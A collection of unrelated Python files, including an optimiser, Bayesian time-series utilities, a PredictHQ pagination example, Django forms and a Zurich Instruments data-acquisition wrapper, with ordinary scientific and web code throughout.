                # ... force at least one randomly chosen parameter to come from the mutant
cross_points[np.random.randint(0, num_params)] = True
# The parameters of the individual's genome that require crossover gets changed for those of the mutant,
# producing a new individual
trial = np.where(cross_points, mutant, pop[j])
# Scales the genome of the new individual from the range [0,1] to the range specified by the parameter
# boundaries
trial_denorm = min_b + trial * diff
# Evaluates fitness of new individual
f = fobj(trial_denorm)
# If better than the previous one, keeps the new one
if f < unfitness[j]:
unfitness[j] = f
pop[j] = trial
# If better than the best one so far, updates the record
if f < unfitness[best_idx]:
best_idx = j
best = trial_denorm
yield best, unfitness[best_idx]
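# Minimal usage sketch (illustrative, not part of the original module): minimize the
# sphere function over three parameters and keep the last yielded (best) solution.
if __name__ == "__main__":
    def sphere(x):
        return float(np.sum(x ** 2))

    solution = None
    for solution in differential_evolution(sphere, bounds=[(-5, 5)] * 3, popsize=20, gens=50):
        pass
    best_params, best_value = solution
    print("best parameters:", best_params, "objective:", best_value)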
|
1619646
|
import os
import sys
class Config(object):
"""Configuration variables for this test suite
    This creates a variable named CONFIG (available as ${CONFIG} when this
    file is included in a test as a variable file).
Example:
*** Settings ***
    | Variables | ../resources/config.py
*** Test Cases ***
| Example
| | log | username: ${CONFIG}.username
| | log | root url: ${CONFIG}.root_url
"""
def __init__(self):
_here = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(_here, "..", "..")))
sys.path.insert(0, os.path.abspath(os.path.join(_here)))
self.demo_root = os.path.abspath(os.path.join(_here, ".."))
self.port = 8000
self.root_url = "http://localhost:%s" % self.port
self.username = "test user"
self.password = "password"
def __str__(self):
return "<Config: %s>" % str(self.__dict__)
# This creates a variable that robot can see
CONFIG = Config()
|
1619698
|
import numpy as np
from pybasicbayes.distributions import AutoRegression, DiagonalRegression, Regression
def get_empirical_ar_params(train_datas, params):
"""
Estimate the parameters of an AR observation model
by fitting a single AR model to the entire dataset.
"""
assert isinstance(train_datas, list) and len(train_datas) > 0
datadimension = train_datas[0].shape[1]
assert params["nu_0"] > datadimension + 1
# Initialize the observation parameters
obs_params = dict(nu_0=params["nu_0"],
S_0=params['S_0'],
M_0=params['M_0'],
K_0=params['K_0'],
affine=params['affine'])
# Fit an AR model to the entire dataset
obs_distn = AutoRegression(**obs_params)
obs_distn.max_likelihood(train_datas)
# Use the inferred noise covariance as the prior mean
# E_{IW}[S] = S_0 / (nu_0 - datadimension - 1)
obs_params["S_0"] = obs_distn.sigma * (params["nu_0"] - datadimension - 1)
obs_params["M_0"] = obs_distn.A.copy()
return obs_params
def expected_hmm_logprob(pi_0, trans_matrix, stats):
"""
:param pi_0: initial distribution
:param trans_matrix: transition matrix
:param stats: tuple (E[z_t], \sum_t E[z_t z_{t+1}.T])
:return: E_{q(z)} [ log p(z) ]
"""
E_z, sum_E_ztztp1T, _ = stats
T, K = E_z.shape
assert sum_E_ztztp1T.shape == (K, K)
out = 0
out += np.dot(E_z[0], np.log(pi_0))
out += np.sum(sum_E_ztztp1T * np.log(trans_matrix))
return out
def hmm_entropy(params, stats):
log_transmatrix, log_pi_0, aBl, _ = params
E_z, sum_E_ztztp1T, log_Z = stats
T, K = E_z.shape
assert aBl.shape == (T, K)
assert sum_E_ztztp1T.shape == (K, K)
assert log_transmatrix.shape == (K, K)
neg_entropy = np.sum(E_z[0] * log_pi_0)
neg_entropy += np.sum(E_z * aBl)
neg_entropy += np.sum(sum_E_ztztp1T * log_transmatrix)
neg_entropy -= log_Z
return -neg_entropy
def expected_gaussian_logprob(mu, sigma, stats):
D = mu.shape[0]
J = np.linalg.inv(sigma)
h = J.dot(mu)
muJmuT = mu.dot(J).dot(mu.T)
logdetJ = np.linalg.slogdet(J)[1]
x, xxT, n = stats
c1, c2 = ('i,i->', 'ij,ij->') if x.ndim == 1 \
else ('i,ni->n', 'ij,nij->n')
out = -1. / 2 * np.einsum(c2, J, xxT)
out += np.einsum(c1, h, x)
out += -n / 2. * muJmuT
out += -D / 2. * np.log(2 * np.pi) + n / 2. * logdetJ
return out
def expected_regression_log_prob(regression, stats):
if isinstance(regression, DiagonalRegression):
return expected_diag_regression_log_prob(
regression.A, regression.sigmasq_flat, stats)
elif isinstance(regression, Regression):
return expected_dense_regression_log_prob(
regression.A, regression.sigma, stats)
else:
raise Exception("Unrecognized regression object! {}".format(regression))
def expected_dense_regression_log_prob(A, Sigma, stats):
"""
Expected log likelihood of p(y | x) where
y ~ N(Ax, Sigma)
and expectation is wrt q(y,x). We only need expected
sufficient statistics E[yy.T], E[yx.T], E[xx.T], and n,
where n is the number of observations.
:param A: regression matrix
:param Sigma: observation covariance
:param stats: tuple (E[yy.T], E[yx.T], E[xx.T], n)
:return: E[log p(y | x)]
"""
yyT, yxT, xxT, n = stats[-4:]
contract = 'ij,nij->n' if yyT.ndim == 3 else 'ij,ij->'
D = A.shape[0]
Si = np.linalg.inv(Sigma)
SiA = Si.dot(A)
ASiA = A.T.dot(SiA)
out = -1. / 2 * np.einsum(contract, ASiA, xxT)
out += np.einsum(contract, SiA, yxT)
out += -1. / 2 * np.einsum(contract, Si, yyT)
out += -D / 2 * np.log(2 * np.pi) + n / 2. * np.linalg.slogdet(Si)[1]
return out
def expected_diag_regression_log_prob(A, sigmasq, stats):
"""
Expected log likelihood of p(y | x) where
y_{n,d} ~ N(a_d^\trans x_n, sigma_d^2)
and expectation is wrt q(y,x). We only need expected
sufficient statistics E[yy.T], E[yx.T], E[xx.T], and n,
where n is the number of observations.
:param A: regression matrix
:param sigma: diagonal observation variance
:param stats: tuple (E[yy.T], E[yx.T], E[xx.T], mask)
:return: E[log p(y | x)]
"""
D_out, D_in = A.shape
assert sigmasq.shape == (D_out,)
ysq, yxT, xxT, mask = stats[-4:]
T = ysq.shape[0]
assert ysq.shape == (T, D_out)
assert yxT.shape == (T, D_out, D_in)
# xxT has different shapes depending on whether or not data is missing
# with missing data, it is (T, Dout, Din, Din) since we need to mask
# off certain xxT pairs. If there's no mask, it's always the same for
# every output dimension. To make it easy, we just broadcast along
# the Dout dimension for the no-missing-data case.
if xxT.shape == (T, D_in, D_in):
xxT = xxT[:,None,:,:]
else:
assert xxT.shape == (T, D_out, D_in, D_in)
assert mask.shape == (T, D_out)
AAT = np.array([np.outer(a, a) for a in A])
n = mask.sum(1)
J_node = AAT[None, :, :, :] / sigmasq[None, :, None, None]
h_node = (mask / sigmasq)[:,:,None] * A[None, :, :]
out = -1 / 2. * np.sum(J_node * xxT, axis=(1, 2, 3))
out += np.sum(h_node * yxT, axis=(1, 2))
out += -1 / 2. * np.sum(mask / sigmasq * ysq, axis=1)
out += -n / 2. * np.log(2 * np.pi)
out += -1 / 2. * np.sum(mask * np.log(sigmasq), axis=1)
assert out.shape == (T,)
return out
def lds_entropy(info_params, stats):
# Extract the info params that make up the variational factor
J_init, h_init, log_Z_init, \
J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair, \
J_node, h_node, log_Z_node = info_params
# Extract the expected sufficient statistics
_lds_normalizer, E_x, Var_x, E_xtp1_xtT = stats
E_x_xT = Var_x + E_x[:, :, None] * E_x[:, None, :]
contract = 'tij,tji->'
# Initial potential
nep = -1. / 2 * np.sum(J_init * E_x_xT[0])
nep += h_init.dot(E_x[0])
nep += log_Z_init
# Pair potentials
nep += -1. / 2 * np.einsum(contract, J_pair_22, E_x_xT[1:])
nep += - np.einsum(contract, np.swapaxes(J_pair_21, 1, 2), E_xtp1_xtT)
nep += -1. / 2 * np.einsum(contract, J_pair_11, E_x_xT[:-1])
nep += np.sum(h_pair_1 * E_x[:-1])
nep += np.sum(h_pair_2 * E_x[1:])
nep += np.sum(log_Z_pair)
# Node potentials -- with single emission, J_node is 2D
nep += -1. / 2 * np.einsum(
'tij,tji->' if J_node.ndim == 3 else 'ij,tji->', J_node, E_x_xT)
nep += np.sum(h_node * E_x)
nep += np.sum(log_Z_node)
# Normalizer
nep += -_lds_normalizer
return -nep
def symmetric_blk_tridiagonal_logdet(diagonal_array, off_diagonal_array):
T = len(diagonal_array)
n = diagonal_array.shape[1]
J = np.zeros((T * n, T * n))
for t in np.arange(T):
J[t * n: t * n + n, t * n: t * n + n] = diagonal_array[t]
for t in np.arange(T-1):
J[t * n: t * n + n, t * n + n: t * n + 2 * n] += off_diagonal_array[t].T
J[t * n + n: t * n + 2 * n, t * n: t * n + n] += off_diagonal_array[t]
return np.linalg.slogdet(J)[1]
def test_lds_entropy(info_params):
# Extract the info params that make up the variational factor
J_init, h_init, log_Z_init, \
J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair, \
J_node, h_node, log_Z_node = info_params
T, D = h_node.shape
# Compute the variational entropy by constructing the full Gaussian params.
diagonal_array = J_node.copy()
diagonal_array[0] += J_init
diagonal_array[:-1] += J_pair_11
diagonal_array[1:] += J_pair_22
off_diagonal_array = J_pair_21.copy()
ve = -1. / 2 * symmetric_blk_tridiagonal_logdet(diagonal_array, off_diagonal_array)
ve += 1. / 2 * T * D * (1 + np.log(2 * np.pi))
return ve
def gaussian_map_estimation(stats, gaussian):
D = gaussian.D
x, xxT, n = stats
# Add "pseudocounts" from the prior
mu_0, sigma_0, kappa_0, nu_0 = \
gaussian.mu_0, gaussian.sigma_0, gaussian.kappa_0, gaussian.nu_0
xxT += sigma_0 + kappa_0 * np.outer(mu_0, mu_0)
x += kappa_0 * mu_0
n += nu_0 + 2 + D
# SVD is necessary to check if the max likelihood solution is
# degenerate, which can happen in the EM algorithm
if n < D or (np.linalg.svd(xxT, compute_uv=False) > 1e-6).sum() < D:
raise Exception("Can't to MAP when effective observations < D")
# Set the MAP params
gaussian.mu = x / n
gaussian.sigma = xxT / n - np.outer(gaussian.mu, gaussian.mu)
def regression_map_estimation(stats, regression):
D_out = regression.D_out
# Add prior and likelihood statistics
if isinstance(regression, DiagonalRegression):
regression.max_likelihood(data=None, stats=stats)
else:
sum_tuples = lambda lst: list(map(sum, zip(*lst)))
yyT, yxT, xxT, n = sum_tuples([stats, regression.natural_hypparam])
A = np.linalg.solve(xxT, yxT.T).T
sigma = (yyT - A.dot(yxT.T)) / n
# Make sure sigma is symmetric
symmetrize = lambda A: (A + A.T) / 2.
sigma = 1e-10 * np.eye(D_out) + symmetrize(sigma)
regression.A = A
regression.sigma = sigma
def gaussian_logprior(gaussian):
D = gaussian.D
mu, sigma = gaussian.mu, gaussian.sigma
mu_0, sigma_0, kappa_0, nu_0 = \
gaussian.mu_0, gaussian.sigma_0, gaussian.kappa_0, gaussian.nu_0
# Inverse Wishart IW(sigma | sigma_0, nu_0)
from pybasicbayes.util.stats import invwishart_log_partitionfunction
lp = invwishart_log_partitionfunction(sigma_0, nu_0)
lp += -(nu_0 + D + 1) / 2.0 * np.linalg.slogdet(sigma)[1]
lp += -0.5 * np.trace(np.linalg.solve(sigma, sigma_0))
# Normal N(mu | mu_0, Sigma / kappa_0)
from scipy.linalg import solve_triangular
S_chol = np.linalg.cholesky(sigma / kappa_0)
x = solve_triangular(S_chol, mu - mu_0, lower=True)
lp += -1. / 2. * np.dot(x, x) \
- D / 2 * np.log(2 * np.pi) \
- np.log(S_chol.diagonal()).sum()
return lp
def regression_logprior(regression):
if isinstance(regression, DiagonalRegression):
return diag_regression_logprior(regression)
elif isinstance(regression, Regression):
return dense_regression_logprior(regression)
def diag_regression_logprior(regression):
from scipy.stats import multivariate_normal, gamma
A = regression.A
sigmasq = regression.sigmasq_flat
J, h, alpha, beta = \
regression.J_0, regression.h_0, regression.alpha_0, regression.beta_0
Sigma = np.linalg.inv(J)
mu = Sigma.dot(h)
lp = 0
for d in range(regression.D_out):
lp += multivariate_normal(mu, Sigma).logpdf(A[d])
lp += gamma(alpha, scale=1./beta).logpdf(1. / sigmasq[d])
return lp
def dense_regression_logprior(regression):
A = regression.A
Sigmainv = np.linalg.inv(regression.sigma)
Sigmainv_A = Sigmainv.dot(A)
AT_Sigmainv_A = A.T.dot(Sigmainv_A)
logdetSigmainv = np.linalg.slogdet(Sigmainv)[1]
A, B, C, d = regression.natural_hypparam
bilinear_term = -1./2 * np.trace(A.dot(Sigmainv)) \
+ np.trace(B.T.dot(Sigmainv_A)) \
- 1./2 * np.trace(C.dot(AT_Sigmainv_A)) \
+ 1./2 * d * logdetSigmainv
# log normalizer term
from pybasicbayes.util.stats import mniw_log_partitionfunction
Z = mniw_log_partitionfunction(
*regression._natural_to_standard(regression.natural_hypparam))
return bilinear_term - Z
|
1619711
|
from predicthq import Client
# Please copy paste your access token here
# or read our Quickstart documentation if you don't have a token yet
# https://docs.predicthq.com/guides/quickstart/
ACCESS_TOKEN = 'abc123'
phq = Client(access_token=ACCESS_TOKEN)
# broadcasts and events endpoints use the same approach for search pagination.
# The following examples are on the events endpoint but you can reuse them
# for the broadcasts endpoint.
# By default the search() method only returns the first
# page of results, with a default page size of 10.
# It's because the default values for the offset and limit parameters
# are respectively 0 and 10.
for event in phq.events.search():
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# You can modify this behaviour by specifying an offset and/or a limit.
# The following example skips the first 10 results (offset=10)
# and limits the results to 5 items (limit=5).
for event in phq.events.search(offset=10, limit=5):
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# You can then iterate over the search results set by continuously
# incrementing the offset by the limit value step.
search_params = {
'category': 'sports',
'start': {'gte': '2018-05-01', 'lte': '2018-06-30'},
'within': '10km@-36.844480,174.768368'
}
results_count = phq.events.count(**search_params).count
print(f'Results count: {results_count}')
for offset in range(0, results_count, 10):
    search_params_with_offset_limit = {**search_params, 'offset': offset, 'limit': 10}
    for event in phq.events.search(**search_params_with_offset_limit):
        print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# The Python SDK provides helpers for iterating over the results pages.
# You can chain the iter_all() generator to iterate over all your results.
for event in phq.events.search(**search_params).iter_all():
print(event.rank, event.category, event.title, event.start.strftime('%Y-%m-%d'))
# There is a maximum number of results returned by a single search query
# (currently set at 100k results). Paginating won't allow you to go beyond
# this limit.
# The overflow field will tell you whether you are above this limit or not.
# If that's the case, you need to refine your query to get a smaller set of results
# (e.g. add a `start` or `updated` parameter, add a `category`, etc.).
# If you are likely to get above this limit, it's a good idea to add a test
# and potentially raise in your code.
event_result_set_without_filters = phq.events.search()
if event_result_set_without_filters.overflow is True:
raise RuntimeError("Result set overflowed")
|
1619741
|
from .betfairstream import BetfairStream, HistoricalStream, HistoricalGeneratorStream
from .listener import BaseListener, StreamListener
from .stream import MarketStream, OrderStream
|
1619762
|
from __future__ import annotations
from django import forms
from django.contrib.auth.forms import UserChangeForm as BaseUserChangeForm
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
from jcasts.shared.typedefs import User
class UserChangeForm(BaseUserChangeForm):
class Meta(BaseUserChangeForm.Meta):
model = User
class UserCreationForm(BaseUserCreationForm):
class Meta(BaseUserCreationForm.Meta):
model = User
class UserPreferencesForm(forms.ModelForm):
class Meta:
model = User
fields: tuple[str, ...] = ("send_email_notifications",)
help_texts: dict[str, str] = {
"send_email_notifications": "I'd like to receive notications of new content and recommendations.",
}
|
1619791
|
import time
import numpy as np
from typing import List, Dict
from .base import BaseInstrument
from zhinst.toolkit.control.node_tree import Parameter
from zhinst.toolkit.interface import LoggerModule
_logger = LoggerModule(__name__)
MAPPINGS = {
"edge": {1: "rising", 2: "falling", 3: "both"},
"eventcount_mode": {0: "sample", 1: "increment"},
"fft_window": {
0: "rectangular",
1: "hann",
2: "hamming",
3: "blackman",
16: "exponential",
17: "cosine",
17: "sine",
18: "cosine_squared",
},
"grid_direction": {0: "forward", 1: "reverse", 2: "bidirectional"},
"grid_mode": {1: "nearest", 2: "linear", 4: "exact"},
"save_fileformat": {0: "matlab", 1: "csv", 2: "zview", 3: "sxm", 4: "hdf5"},
"type": {
0: "continuous",
1: "edge",
2: "dio",
3: "pulse",
4: "tracking",
5: "change",
6: "hardware",
7: "tracking_pulse",
8: "eventcount",
},
}
class DAQModule:
"""Implements a :class:`Data Acquisition Module` for Lock-In instruments.
The data acquisition module is a powerful tool that builds on top of LabOne.
It allows for triggered acquisition of multiple data streams on an
equidistant temporal grid. For more information on how to use the DAQ
Module, have a look at the LabOne Programming Manual.
    This base class is overridden by device-specific DAQ classes with
additional signal sources and types. After setup, the nodetree of the module
is retrieved from the API and added to the DAQModule object attributes as
`zhinst-toolkit` :class:`Parameters`.
In a typical measurement using the DAQ Module one would first configure its
trigger and grid settings.
>>> # configure a measurement
>>> mfli.daq.fft_window("rectangular")
>>> mfli.daq.type("continuous")
>>> mfli.daq.grid_cols(512)
>>> mfli.daq.grid_rows(10)
The signal streams that are available for acquisition can be listed using
`signals_list(...)`.
>>> # list available signal sources ...
>>> mf.daq.signals_list()
['auxin0', 'demod0', 'demod1', 'imp0']
    >>> # ... and the corresponding signal types
>>> mf.daq.signals_list("demod1")
['x', 'y', 'r', 'xiy', 'theta', 'frequency', 'auxin0', 'auxin1', 'dio']
To specify which signals should be acquired during the measurement, they
need to be added to the measurement. This is done with the
`signals_add(...)` method. Note that the return value is a string with the
exact node path that will be subscribed to during the measurement. The
string can be used later as a key in the `results` dictionary.
>>> # add signals to the measurement
>>> mf.daq.signals_clear()
>>> signal1 = mf.daq.signals_add("demod1", "r") # specify signal_source and signal_type
>>> signal2 = mf.daq.signals_add("demod1", "theta")
>>> signal3 = mf.daq.signals_add("demod1", "xiy", fft=True)
The measurement is started ...
>>> # start the measurement
>>> mf.daq.measure()
subscribed to: /dev3337/demods/0/sample.r.avg
subscribed to: /dev3337/demods/0/sample.theta.avg
subscribed to: /dev3337/demods/0/sample.xiy.fft.abs.avg
Progress: 0.0%
Progress: 40.0%
...
... and afterwards the results can be found in the `results` attribute of
the :class:`DAQModule`. The values in the dictionary are of type
:class:`DAQResults`.
>>> # retrieve the measurement results
>>> result1 = mf.daq.results[signal1]
>>> result2 = mf.daq.results[signal2]
>>> result3 = mf.daq.results[signal3]
>>> ...
>>> result1
<zhinst.toolkit.control.drivers.base.daq.DAQResult object at 0x0000023B8467D588>
path: /dev3337/demods/0/sample.xiy.fft.abs.avg
value: (10, 511)
frequency: (511,)
See below for details on
:class:`zhinst.toolkit.control.drivers.base.daq.DAQResult`.
Attributes:
signals (list): A list of node strings of signals that are added to the
measurement and will be subscribed to before data acquisition.
results (dict): A dictionary with signal strings as keys and
:class:`zhinst.toolkit.control.drivers.base.daq.DAQResult` objects
as values that hold all the data of the measurement result.
"""
def __init__(self, parent: BaseInstrument, clk_rate: float = 60e6) -> None:
self._parent = parent
self._module = None
self._signals = []
self._results = {}
self._clk_rate = clk_rate
# the `streaming_nodes` are used as all available signal sources for the data acquisition
self._signal_sources = self._parent._get_streamingnodes()
self._signal_types = {
"auxin": {"auxin1": ".Auxin0", "auxin2": ".Auxin1"},
"demod": {
"x": ".X",
"y": ".Y",
"r": ".R",
"xiy": ".xiy",
"theta": ".Theta",
"frequency": ".Frequency",
"auxin0": ".AuxIn0",
"auxin1": ".AuxIn1",
"dio": ".Dio",
},
"imp": {
"real": ".RealZ",
"imag": ".ImagZ",
"abs": ".AbsZ",
"phase": ".PhaseZ",
"frequency": ".Frequency",
"param0": ".Param0",
"param1": ".Param1",
},
"cnt": {"": ".Value"},
"pid": {"": ""},
}
self._trigger_signals = {}
self._trigger_types = {}
def _setup(self) -> None:
self._module = self._parent._controller.connection.daq_module
# add all parameters from nodetree
nodetree = self._module.get_nodetree("*")
for k, v in nodetree.items():
name = k[1:].replace("/", "_")
mapping = MAPPINGS[name] if name in MAPPINGS.keys() else None
setattr(self, name, Parameter(self, v, device=self, mapping=mapping))
self._init_settings()
def _set(self, *args, **kwargs):
if kwargs.get("sync", False):
_logger.warning(
"The daq module does not support the `sync` flag."
)
if self._module is None:
_logger.error(
"This DAQ is not connected to a dataAcquisitionModule!",
_logger.ExceptionTypes.ToolkitConnectionError,
)
return self._module.set(*args, device=self._parent.serial)
def _get(self, *args, valueonly: bool = True):
if self._module is None:
_logger.error(
"This DAQ is not connected to a dataAcquisitionModule!",
_logger.ExceptionTypes.ToolkitConnectionError,
)
data = self._module.get(*args, device=self._parent.serial)
return list(data.values())[0][0] if valueonly else data
def _init_settings(self):
self._set("preview", 1)
self._set("historylength", 10)
self._set("bandwidth", 0)
self._set("hysteresis", 0.01)
self._set("level", 0.1)
self._set("clearhistory", 1)
self._set("bandwidth", 0)
def trigger_list(self, source=None) -> List:
"""Returns a list of all the available signal sources for triggering.
Keyword Arguments:
source (str): specifies the signal source to return signal types
(default: None)
Returns:
Returns all available trigger sources by default. If the keyword is
specified with one of the trigger sources, all the available trigger
types for the trigger source are returned.
"""
sources = list(self._trigger_signals.keys())
if source is None:
return sources
else:
for signal in self._trigger_types.keys():
if signal in source:
return list(self._trigger_types[signal].keys())
def trigger(self, trigger_source: str, trigger_type: str) -> None:
"""Sets the trigger signal of the *DAQ Module*.
This method can be used to specify the signal used to trigger the data
acquisition. Use the method `trigger_list()` to see the available
        trigger signal sources and types. The trigger node can also be set
directly using the module Parameter `triggernode`.
Arguments:
trigger_source (str): A string that specifies the source of the
trigger signal, e.g. "demod0".
            trigger_type (str): A string that specifies the type of the
trigger signal, e.g. "trigin1".
"""
trigger_node = self._parse_trigger(trigger_source, trigger_type)
self._set("/triggernode", trigger_node)
print(f"set trigger node to '{trigger_node}'")
def signals_list(self, source=None) -> List:
"""Returns a list of all the available signal sources for data acquisition.
Keyword Arguments:
source (str): specifies the signal source to return signal types
(default: None)
Returns:
Returns all available signal sources by default. If the keyword is
specified with one of the signal sources, all the available signal
types for the signal source are returned.
"""
sources = list(self._signal_sources.keys())
if source is None:
return sources
else:
for signal in self._signal_types.keys():
if signal in source:
return list(self._signal_types[signal].keys())
else:
return sources
def signals_add(
self,
signal_source: str,
signal_type: str = "",
operation: str = "avg",
fft: bool = False,
complex_selector: str = "abs",
) -> str:
"""Add a signal to the signals list to be subscribed to during measurement.
The specified signal is added to the property *signals* list. On
`measure()`, the *DAQ Module* subscribes to all the signal nodes in the
list.
Arguments:
signal_source (str): The source of the signal, e.g. 'demod0'. See
`signals_list()` for available signals.
Keyword Arguments:
signal_type (str): The type of the signal. Depends on the given
                source, e.g. for demod signals the types 'X', 'Y', 'R', 'Theta',
... are available. See `signals_list({signal source})` for
available signal types. (default: "")
operation (str): The operation that is performed on the acquired
signal, e.g. the average of data points ('avg'), the standard
deviation of the signal ('std') or single points ('replace').
(default: "avg")
fft (bool): A flag to enable the fourier transform (FFT) of the
acquired signal. (default: False)
complex_selector (str): If the FFT is enabled, this selects the
complex value of the result, e.g. 'abs', 'phase', 'real',
'imag'. (default: "abs")
Returns:
A string with the exact signal node that will be acquired during the
measurement. It can be used as a key in the `results` dict to
retrieve the measurement result corresponding to this signal, e.g.
            >>> signal = mfli.daq.signals_add("demod0", "r")
/dev3337/demods/0/sample.r.avg
>>> mfli.daq.measure()
>>> ...
>>> result = mfli.daq.results[signal]
"""
signal_node = self._parse_signals(
signal_source, signal_type, operation, fft, complex_selector
)
if signal_node not in self.signals:
self._signals.append(signal_node)
return signal_node
def signals_clear(self) -> None:
"""Resets the signals list."""
self._signals = []
def measure(self, verbose: bool = True, timeout: float = 20) -> None:
"""Performs the measurement.
Starts a measurement and stores the result in `daq.results`. This
method subscribes to all the paths previously added to `daq.signals`,
        then starts the measurement, waits until the measurement is finished
and eventually reads the result.
Keyword Arguments:
verbose (bool): A flag to enable or disable console output during
the measurement. (default: True)
timeout (int): The measurement will be stopped after the timeout.
The value is given in seconds. (default: 20)
Raises:
TimeoutError: if the measurement is not completed before
timeout.
"""
self._set("endless", 0)
self._set("clearhistory", 1)
for path in self.signals:
self._module.subscribe(path)
if verbose:
print(f"subscribed to: {path}")
self._module.execute()
tik = time.time()
while not self._module.finished():
if verbose:
print(f"Progress: {(self._module.progress()[0] * 100):.1f}%")
time.sleep(0.5)
tok = time.time()
if tok - tik > timeout:
_logger.error(
f"DAQ Module: Measurement timed out!",
_logger.ExceptionTypes.TimeoutError,
)
if verbose:
print("Finished")
result = self._module.read(flat=True)
self._module.finish()
self._module.unsubscribe("*")
self._get_result_from_dict(result)
def _parse_signals(
self,
signal_source: str,
signal_type: str,
operation: str,
fft: bool,
complex_selector: str,
) -> str:
signal_node = "/" + self._parent.serial
signal_node += self._parse_signal_source(signal_source)
signal_node += self._parse_signal_type(signal_type, signal_source)
signal_node += self._parse_fft(fft, complex_selector)
signal_node += self._parse_operation(operation)
return signal_node.lower()
def _parse_signal_source(self, source: str) -> str:
source = source.lower()
if source not in self._signal_sources:
_logger.error(
f"Signal source must be in {self._signal_sources.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return self._signal_sources[source]
def _parse_signal_type(self, signal_type: str, signal_source: str) -> str:
signal_source = signal_source.lower()
signal_type = signal_type.lower()
types = {}
for signal in self._signal_types.keys():
if signal in signal_source:
types = self._signal_types[signal]
if signal_type not in types.keys():
_logger.error(
f"Signal type must be in {types.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return types[signal_type]
def _parse_operation(self, operation: str) -> str:
operations = ["replace", "avg", "std"]
if operation not in operations:
_logger.error(
f"Operation must be in {operations}",
_logger.ExceptionTypes.ToolkitError,
)
if operation == "replace":
operation = ""
return f".{operation}"
def _parse_fft(self, fft: bool, selector: str) -> str:
if fft:
selectors = ["real", "imag", "abs", "phase"]
if selector not in selectors:
_logger.error(
f"Operation must be in {selectors}",
_logger.ExceptionTypes.ToolkitError,
)
return f".fft.{selector}"
else:
return ""
def _parse_trigger(self, trigger_source: str, trigger_type: str) -> str:
trigger_node = "/" + self._parent.serial
trigger_node += self._parse_trigger_source(trigger_source)
trigger_node += self._parse_trigger_type(trigger_source, trigger_type)
return trigger_node
def _parse_trigger_source(self, source: str) -> str:
source = source.lower()
sources = self._trigger_signals
if source not in sources:
_logger.error(
f"Signal source must be in {sources.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return sources[source]
def _parse_trigger_type(self, trigger_source: str, trigger_type: str) -> str:
trigger_source = trigger_source.lower()
trigger_type = trigger_type.lower()
types = {}
for signal in self._trigger_types.keys():
if signal in trigger_source:
types = self._trigger_types[signal]
if trigger_type.lower() not in types.keys():
_logger.error(
f"Signal type must be in {types.keys()}",
_logger.ExceptionTypes.ToolkitError,
)
return types[trigger_type]
def _get_result_from_dict(self, result: Dict):
self._results = {}
for node in self.signals:
node = node.lower()
if node not in result.keys():
_logger.error(
f"The signal {node} is not in {list(result.keys())}",
_logger.ExceptionTypes.ToolkitError,
)
self._results[node] = DAQResult(
node, result[node][0], clk_rate=self._clk_rate
)
def __repr__(self):
s = super().__repr__()
s += "\n\nsignals:\n"
for signal in self.signals:
s += f" - '{signal}'\n"
s += "parameters:\n"
for key, value in self.__dict__.items():
if isinstance(value, Parameter):
s += f" - {key}\n"
return s
@property
def signals(self):
return self._signals
@property
def results(self):
return self._results
class DAQResult:
"""A wrapper class around the result of a DAQ Module measurement.
The Data Acquisition Result class holds all measurement information returned
from the API. The attribute `value` is a two-dimensional numpy array with
the measured data along the measured grid. Depending on whether the time
    trace or the FFT of a signal was acquired, either the `time` or `frequency`
attribute holds a 1D numpy array with the correct axis values calculated
from the measurement grid.
>>> signal = mf.daq.signals_add("demod1", "r")
>>> mf.daq.measure()
...
>>> result = mf.daq.results[signal]
>>> result
<zhinst.toolkit.control.drivers.base.daq.DAQResult object at 0x0000023B8467D588>
path: /dev3337/demods/0/sample.r.avg
value: (10, 511)
time: (511,)
>>> result.header
{'systemtime': array([1585136936490779], dtype=uint64),
'createdtimestamp': array([548560038356], dtype=uint64),
'changedtimestamp': array([548669852116], dtype=uint64),
'flags': array([1977], dtype=uint32),
...
>>> plt.imshow(result.value, extent=[result.time[0], result.time[-1], 0, result.shape[0]])
Attributes:
value (array): A 2D numpy array with the measurement result.
shape (tuple): A tuple with the shape of the acquired data which
corresponds to the according grid settings.
time (array): A 1D numpy array containing the time axis of the
measurement in seconds. Calculated from the returned timestamps
using the DAC clock rate. If the result is a Fourier transform this
value is `None`.
frequency (array): A 1D numpy array with the frequency values for FFT
measurements in Hertz. If the signal is not a FFT this value is
`None` The frequency grid is calculated from the grid settings. If
the "xiy" complex signal of the demodulator data stream is acquired,
the frequency spectrum is symmetric around 0 Hz, otherwise it is
positive.
header (dict): A dictionary containing all information about the
measurement settings.
"""
def __init__(self, path: str, result_dict: Dict, clk_rate: float = 60e6) -> None:
self._path = path
self._clk_rate = clk_rate
self._is_fft = "fft" in self._path
self._result_dict = result_dict
self._header = self._result_dict.get("header", {})
self._value = self._result_dict.get("value")
self._time = None
        self._frequency = None
if not self._is_fft:
            self._time = self._calculate_time()
else:
self._frequency = self._calculate_freqs()
@property
def value(self):
return self._value
@property
def header(self):
return self._header
@property
def time(self):
return self._time
@property
def frequency(self):
return self._frequency
@property
def shape(self):
return self._value.shape
    def _calculate_time(self):
timestamp = self._result_dict["timestamp"]
return (timestamp[0] - timestamp[0][0]) / self._clk_rate
def _calculate_freqs(self):
bin_count = len(self.value[0])
bin_resolution = self.header["gridcoldelta"]
frequencies = np.arange(bin_count)
bandwidth = bin_resolution * len(frequencies)
frequencies = frequencies * bin_resolution
if "xiy" in self._path:
frequencies = frequencies - bandwidth / 2.0 + bin_resolution / 2.0
return frequencies
def __repr__(self):
s = super().__repr__()
s += "\n\n"
s += f"path: {self._path}\n"
s += f"value: {self._value.shape}\n"
if self._is_fft:
s += f"frequency: {self._frequency.shape}\n"
else:
s += f"time: {self._time.shape}\n"
return s
|
1619798
|
def so_32(n):
"""Finds the symmetry preserving HNFs for the simple orthorhombic lattices
with a determinant of n. Assuming A = [[1,0,0],[0,2,0],[0,0,3]].
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
